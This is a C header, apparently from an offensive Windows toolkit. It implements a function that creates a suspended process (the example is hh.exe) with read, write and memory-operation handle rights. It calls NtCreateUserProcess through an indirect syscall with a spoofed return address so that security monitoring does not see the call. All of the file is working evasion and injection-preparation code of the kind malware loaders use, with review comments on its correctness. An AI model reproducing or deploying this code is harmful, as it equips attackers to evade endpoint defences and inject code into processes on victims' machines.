// Creates a process in the suspended state through NtCreateUserProcess, reached via
// SysNtCreateUserProcess and RetSpoofCall (an indirect syscall with a spoofed return address,
// see retaddrspoof.h). Note: the function below is *defined* here with external linkage, and
// #pragma once only guards a single translation unit — include this header from exactly one
// .c/.cpp file or the link fails with a duplicate symbol.
#pragma once
#include "functions.h"
#include "structs.h"
#include "retaddrspoof.h"
#define ZeroOut RtlSecureZeroMemory
#define PS_ATTRIBUTE_IMAGE_NAME PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
extern PVOID Gdgt;
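/// <summary>
/// Creates a process in the suspended state with NtCreateUserProcess, invoked through
/// SysNtCreateUserProcess and RetSpoofCall (indirect syscall with a spoofed return address;
/// the gadget address comes from the file-level Gdgt). szProcessName must be an NT
/// object-manager path, e.g. \\??\\C:\\Windows\\hh.exe, and is also used verbatim as the
/// new process's command line. No DllPath, CurrentDirectory or Environment is supplied, so
/// those come from the loader's defaults.
/// </summary>
/// <param name="szProcessName">NT path of the image to start (L"\\??\\C:\\...\\x.exe"). Must not be NULL.</param>
/// <param name="hCreatedProcess">Receives the process handle, opened with
/// PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_TERMINATE.
/// Must not be NULL. Set to NULL on any failure.</param>
/// <param name="hCreatedThread">Receives the initial thread handle, opened with THREAD_SUSPEND_RESUME only
/// (enough to resume it later). Must not be NULL. Set to NULL on any failure.</param>
/// <returns>STATUS_SUCCESS on success, the failing NTSTATUS from RtlCreateProcessParametersEx or
/// NtCreateUserProcess otherwise, or STATUS_INVALID_PARAMETER (0xC000000D) if an output pointer is NULL.
/// On success the caller owns both handles and must close them.</returns>
NTSTATUS NtCreateUserSuspendedProcess(const wchar_t* szProcessName, PHANDLE hCreatedProcess, PHANDLE hCreatedThread) {
    // Reject NULL output pointers instead of faulting on the final stores, and give the
    // caller a defined value on every failure path.
    if (hCreatedProcess == NULL || hCreatedThread == NULL) {
        return (NTSTATUS)0xC000000DL; // STATUS_INVALID_PARAMETER
    }
    *hCreatedProcess = NULL;
    *hCreatedThread = NULL;

    UNICODE_STRING NtImagePath;
    ZeroOut(&NtImagePath, sizeof(UNICODE_STRING));
    RtlInitUnicodeString(&NtImagePath, szProcessName);

    // Build the RTL_USER_PROCESS_PARAMETERS block. Only ImagePathName and CommandLine are
    // given (the same NT path for both); the remaining fields are left to the loader.
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;
    NTSTATUS status = (NTSTATUS)RetSpoofCall((void*)RtlCreateProcessParametersEx, 11, Gdgt,
        &ProcessParameters,
        &NtImagePath,                           // ImagePathName
        NULL,                                   // DllPath
        NULL,                                   // CurrentDirectory
        &NtImagePath,                           // CommandLine: same as the image path
        NULL,                                   // Environment
        NULL,                                   // WindowTitle
        NULL,                                   // DesktopInfo
        NULL,                                   // ShellInfo
        NULL,                                   // RuntimeData
        RTL_USER_PROCESS_PARAMETERS_NORMALIZED
    );
    // Previously this status was ignored and a NULL ProcessParameters was handed to
    // NtCreateUserProcess, which hid the real cause of the failure. NT_SUCCESS is status >= 0.
    if (status < 0) {
        return status;
    }

    PS_CREATE_INFO CreateInfo = { 0 };
    CreateInfo.Size = sizeof(CreateInfo);
    CreateInfo.State = PsCreateInitialState;

    // Exactly one attribute is passed: the image name. TotalLength covers the list header
    // plus the attributes present; sizeof(AttributeList) is the same value the old code
    // computed as (sizeof(PS_ATTRIBUTE_LIST) + sizeof(PS_ATTRIBUTE)) - sizeof(PS_ATTRIBUTE).
    // NOTE(review): correct only if PS_ATTRIBUTE_LIST in structs.h declares a single
    // PS_ATTRIBUTE entry — confirm; a larger array would overstate the attribute count.
    PS_ATTRIBUTE_LIST AttributeList = { 0 };
    AttributeList.TotalLength = sizeof(AttributeList);
    AttributeList.Attributes[0].Attribute = PS_ATTRIBUTE_IMAGE_NAME;
    AttributeList.Attributes[0].Size = NtImagePath.Length;     // byte length, no terminator
    AttributeList.Attributes[0].Value = (ULONG_PTR)NtImagePath.Buffer;

    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    status = (NTSTATUS)RetSpoofCall((void*)SysNtCreateUserProcess, 11, Gdgt,
        &hProcess,
        &hThread,
        PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_TERMINATE,
        THREAD_SUSPEND_RESUME,
        NULL,                                   // ProcessObjectAttributes
        NULL,                                   // ThreadObjectAttributes
        0,                                      // ProcessFlags
        THREAD_CREATE_FLAGS_CREATE_SUSPENDED,   // ThreadFlags: initial thread starts suspended
        ProcessParameters,
        &CreateInfo,
        &AttributeList
    );

    // NOTE(review): ProcessParameters is never released. The kernel has its own copy once
    // NtCreateUserProcess returns, so it could be freed with RtlDestroyProcessParameters
    // here; not added because that routine's declaration is not visible from this header.
    *hCreatedProcess = hProcess;
    *hCreatedThread = hThread;
    return status;
}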